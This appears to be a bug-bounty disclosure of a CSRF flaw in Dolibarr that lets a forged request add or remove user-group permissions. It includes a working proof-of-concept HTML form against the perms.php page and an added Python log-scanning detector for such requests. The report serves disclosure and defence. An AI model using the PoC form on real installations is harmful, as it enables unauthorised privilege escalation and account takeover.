Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 18th 2021


✍️ Description

An attacker can add or delete any permission for any user through a CSRF vulnerability when the Admin, a SuperAdmin, or another authorized user clicks on the PoC.html file. The attacker only needs to know the permission id on the server, and ids start from 1.

There is no CSRF token in this request, so the CSRF attack can easily be performed.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.75.10/user/group/perms.php">
      <input type="hidden" name="id" value="5" />
      <input type="hidden" name="action" value="addrights" />
      <input type="hidden" name="entity" value="1" />
      <input type="hidden" name="rights" value="71" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


💥 Impact

This vulnerability can lead to account takeover: if the attacker is a very low-privileged user, the attacker can obtain very high privileges and could then modify other users and members and ...
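The PoC form has no method attribute, so the browser submits it as a GET and the parameters appear in the web server's access log. The following Python detection routine is an added example (not part of the original report or of Dolibarr's code) that flags such permission changes when the Referer is missing or points to another host. The combined log format, the `delrights` action name and the sample log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

APP_HOST = "192.168.75.10"            # host from the PoC's form action
TARGET_PATH = "/user/group/perms.php"  # path from the PoC's form action
# "addrights" is from the PoC; "delrights" is assumed to be the matching delete action.
RIGHTS_ACTIONS = {"addrights", "delrights"}

# Apache/nginx "combined" access log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample log lines: one page view, one in-app change, two cross-site changes.
SAMPLE_LOG = [
    '192.168.75.20 - - [18/Jul/2021:10:01:02 +0000] "GET /user/group/perms.php?id=5 HTTP/1.1" 200 5120 "http://192.168.75.10/" "Mozilla/5.0"',
    '192.168.75.20 - - [18/Jul/2021:10:01:09 +0000] "GET /user/group/perms.php?id=5&action=addrights&entity=1&rights=71 HTTP/1.1" 200 5130 "http://192.168.75.10/user/group/perms.php?id=5" "Mozilla/5.0"',
    '192.168.75.20 - - [18/Jul/2021:10:07:41 +0000] "GET /user/group/perms.php?id=5&action=addrights&entity=1&rights=71 HTTP/1.1" 200 5130 "http://203.0.113.7/" "Mozilla/5.0"',
    '192.168.75.20 - - [18/Jul/2021:10:09:15 +0000] "GET /user/group/perms.php?id=5&action=addrights&entity=1&rights=72 HTTP/1.1" 200 5130 "-" "Mozilla/5.0"',
]

def suspicious_rights_changes(lines, app_host=APP_HOST):
    """Return permission-change requests whose Referer is absent or not the app's own host."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        qs = parse_qs(url.query)
        action = qs.get("action", [""])[0]
        if not url.path.endswith(TARGET_PATH) or action not in RIGHTS_ACTIONS:
            continue
        referer = m["referer"]
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        if ref_host == app_host:
            continue  # request came from a page of the application itself
        findings.append({
            "client": m["ip"], "method": m["method"], "action": action,
            "group_id": qs.get("id", [""])[0], "right": qs.get("rights", [""])[0],
            "referer_host": ref_host,
        })
    return findings

if __name__ == "__main__":
    for finding in suspicious_rights_changes(SAMPLE_LOG):
        print(finding)
```

A missing Referer is reported as well because a PoC opened from a local file sends none; requests that carry their parameters in a POST body are outside what an access log shows.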

We have contacted a member of the dolibarr team and are waiting to hear back 2 years ago
Laurent Destailleur validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs